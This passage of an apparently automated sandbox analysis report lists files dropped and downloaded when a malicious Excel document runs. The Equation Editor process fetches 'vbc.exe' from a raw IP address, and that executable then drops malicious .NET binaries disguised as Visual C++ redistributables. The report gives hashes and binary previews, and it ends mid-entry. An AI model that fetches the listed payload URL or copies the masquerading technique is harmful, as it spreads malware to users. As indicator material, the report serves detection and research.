File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	502872
Entropy (8bit):	6.882988649507878
Encrypted:	false
SSDEEP:	12288:xBzcmhiTB+pwPprnVmLmDsC+FU+ZOSzt9tzZcymOz:xBomhiFDFncLmKDZOSzXFZcLOz
MD5:	5234AED3D382A0A24BC7379D778D67E7
SHA1:	DA0E8FEBAE332ED801AF7D892DDFF245BD9EA903
SHA-256:	46EF8461B175D53871225F64CCC97728F3AE4C3D2077C88BF773BEC13D4322C6
SHA-512:	BB550DDB0EA0766CB9235E1C856DA19090F5C34A1AF648354F2C90BE84B6AD2330E2D63AF78F6C48D5F2CDF77AB36FDC916FDA4BA2BAB3CEE5274A5DE91A9B76
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	497192
Entropy (8bit):	7.000997684511801
Encrypted:	false
SSDEEP:	12288:xBzcmhiF0IursYCYQeSnyZJiqlEbXSb9NtoqOFBqkYHkZH:xBomhimMYenGJiKEbXWtpOLl5
MD5:	07585DD0E675441A614D5718BB37EA6D
SHA1:	6B688BEEFC75BCBEF123376B5BA0AF8025C31E19
SHA-256:	FEB55A8C451E7C70B99996A10457FE8C35352E86B1BBA88756E492061F429161
SHA-512:	A93F7007A09AA6A966F532F11048DCD82508559C39FE0D99EE704CBABDD3660B4D03ED3C5BD9F70DB52445B899037CA1A0C3DD38D9335849277F7E1F7BB20CCD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	497048
Entropy (8bit):	7.0006830725440805
Encrypted:	false
SSDEEP:	12288:xBzcmhiF0IursYCYQeSnyZJiqlEbXSb9NtCGOF2O27MVz+ZH:xBomhimMYenGJiKEbXWtfOkU+
MD5:	22AA51E7039E4FFEF511EBD40419A3FE
SHA1:	158915E133C50182EF03BEF97A6FFC5DF3D4E51A
SHA-256:	2C233FF53B34C96AB5FA65E688DE67F67DD50944FFB41D40DED5158B388C30E1
SHA-512:	2A8D41E09F7FB1F448059889A356C14AE790C1271C0EA7B18A7930A924876712818541023913534F025736377E7D82943743C2E6CD8D125FCFF5B56075021AE3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	863376
Entropy (8bit):	7.528329546751302
Encrypted:	false
SSDEEP:	24576:xBomhi5IgNaPwK7x7qknIkYbJ41F0tc+aE/xkL:xBom857gPr7HtREy
MD5:	854659FC3A2D89ACC3C741A8F0CB8D00
SHA1:	6050D4A3BCA96BEA30C8C52376D7923792CF7D51
SHA-256:	8A8215538116AD6974186614D5848DB3683DEEB9219FD0C576185570CC6E631C
SHA-512:	B965DBADC9CE089FF82C7A2AA50EBE45DDCBAFA70349BAE49F72F0FCD9CB673A6279EF40CDA4B14342EDF9AAF8780CCB7F662BD8A6E5EF1C58C1217141A8D63C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	863352
Entropy (8bit):	7.528624561141394
Encrypted:	false
SSDEEP:	24576:xBomhi5IgNaPMKWdaVjNpNnbI/nCkV8riYEzA47nxkL:xBom857gPf8+jx8KOUitzU
MD5:	E42C7161869F94C8054158A68C353912
SHA1:	8FF420367E5E8184FA2C72301AE5C3DAB201BE08
SHA-256:	B0CE5683AB00A4E1AE578F43C26B95B3290018C17D9C13F7057BC7D4B650FDB8
SHA-512:	68271AA4177AA368BB2179122EA93BABF043D8A85CE99503FF68CA27EF2ED363502037BB66B638C2A34D3ADCE5D15DE5DDB3FD9E00F3D5793554690A1527BA43
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	502840
Entropy (8bit):	6.884212442536518
Encrypted:	false
SSDEEP:	12288:xBzcmhiTB+pwPprnVmLmDsC+FU+ZOSzDBtzY7UWfR2hymOz:xBomhiFDFncLmKDZOSz1FO5iLOz
MD5:	50FD9A8D5B318D259F191306765AF3BC
SHA1:	BE5E9233008FC4EA25C90F84D2294CCE99EDFDA4
SHA-256:	FDB71B9E9B09A6B5EA0FFC70D66F8515CF1302AE260FBBC029E86ED56B9CAC70
SHA-512:	25D1C5F6A89E522E10DE2AC76369F3F2F344121561E5AE2A6EACB122E1AFE45DE755237E57ADB3D581352A1A8FFDBBFFDC463A94CB4ABA30EEF471DAF77FDB25
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	750080
Entropy (8bit):	7.776973471580677
Encrypted:	false
SSDEEP:	12288:xBzcmhiTIabUtWTlW/kcbP3/1S/XTBWym1jr0ahKpymrF9oZXKanCB7U3WJ3m5Ja:xBomhiE5tWxWBz/1YjBZm1jrdhm999Um
MD5:	748F5D75A9F4C4026CC14E46BAFF0BB3
SHA1:	69A81FD68106C9DE3FA4657CEC2468C29A45A171
SHA-256:	A9BA8137D635EF997C4D1388B7758157FA8EE4BFFFCACC49BDF7C5DFE9003421
SHA-512:	191F84E6C6955A2A561F9414EC09ADC660059CC07AB1044FF309C85E1F5B4681F1C8DED5DFA209C1F7BDB19B6718052207D6E1ADC31AF53E97BD52879174C2A0
Malicious:	true
IE Cache URL:	http://198.12.91.205/50005/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12BE1E03.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 600 x 306, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	42465
Entropy (8bit):	7.979580180885764
Encrypted:	false
SSDEEP:	768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
MD5:	C31D090D0B6B5BCA539D0E9DB0C57026
SHA1:	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
SHA-256:	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
SHA-512:	B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
Malicious:	false
Preview:	.PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u..'.................//F.......h.++..j...e....A.H?>.......\|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..]\-..yG2Ne.B....\@q....8.....W./i.C..P....O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D64CE91.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1EA1A46D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	7.935202367366306
Encrypted:	false
SSDEEP:	192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
MD5:	A7E2241249BDCC0CE1FAAF9F4D5C32AF
SHA1:	3125EA93A379A846B0D414B42975AADB72290EB4
SHA-256:	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
SHA-512:	A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
Malicious:	false
Preview:	.PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...\|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw.....#..._....I....k.!":...H.....eKN.....9....{%......7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k\|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P\|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V\|.].-Oo..........._.;@c....`.....\|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2968A71C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F031FF2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6364
Entropy (8bit):	7.935202367366306
Encrypted:	false
SSDEEP:	192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
MD5:	A7E2241249BDCC0CE1FAAF9F4D5C32AF
SHA1:	3125EA93A379A846B0D414B42975AADB72290EB4
SHA-256:	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
SHA-512:	A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
Malicious:	false
Preview:	.PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...\|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw.....#..._....I....k.!":...H.....eKN.....9....{%......7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k\|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P\|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V\|.].-Oo..........._.;@c....`.....\|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45DC78A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:	192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51426C75.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE55544.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6411678270566779
Encrypted:	false
SSDEEP:	384:wGXXwBkNWZ3cJuUvmWnTG+W4nH8ddxzsFfWdl:NXwBkNWZ3cjvmWa+Vnul
MD5:	C0EBDEA7F4DB4DCB07C23B1FDA6F0DF2
SHA1:	E745CFF86CC0D24A6A451E8F652EFD7B541EB61E
SHA-256:	3D4A2C69CCCFA7A6A877B61DBE01D770417EB75E2816EE660591DD53C0472C74
SHA-512:	F13F94CA3A789B12B43768941C171DA93FA2F4761D399FBB588894B15F781D8A7B6985E7C77CA2CB9E7EF47966BECE85413F49F1B9C15AC3F41D20315EE81383
Malicious:	false
Preview:	....l...............1...........Q>..<... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..................................................}...%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...h.3..f.Y.@..%...D.3...3.......3.l.3.RQ>[..3...3.....T.3...3.$Q>[..3...3. ...Id.Y..3...3. .........:..d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........x.3.X.....3...3..8.Y......:.dv......%...........%...........%...........!...........................}..."...........%...........%...........%...........T...T..........................@.E.@....1.......L...................}...P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\880C4A09.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14828
Entropy (8bit):	7.9434227607871355
Encrypted:	false
SSDEEP:	384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
MD5:	58DD6AF7C438B638A88D107CC87009C7
SHA1:	F25E7F2F240DC924A7B48538164A5B3A54E91AC6
SHA-256:	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
SHA-512:	C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
Malicious:	false
Preview:	.PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...\|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..TQ.%..X.......{....,.q.\,.E".........z...abbB...j.\.J.(.b.......\|>...........R....L&..X.eYV"..-.R)B.TM&..pX.j.Z..9..F.Z.6....b.\./%..~...).B<..T.z..D"..(...\...d2YKKK...mm.T..l.T..I$.x<..J..q...J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.\|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..\|>/.Hd2....EQ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9005876.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19408
Entropy (8bit):	7.931403681362504
Encrypted:	false
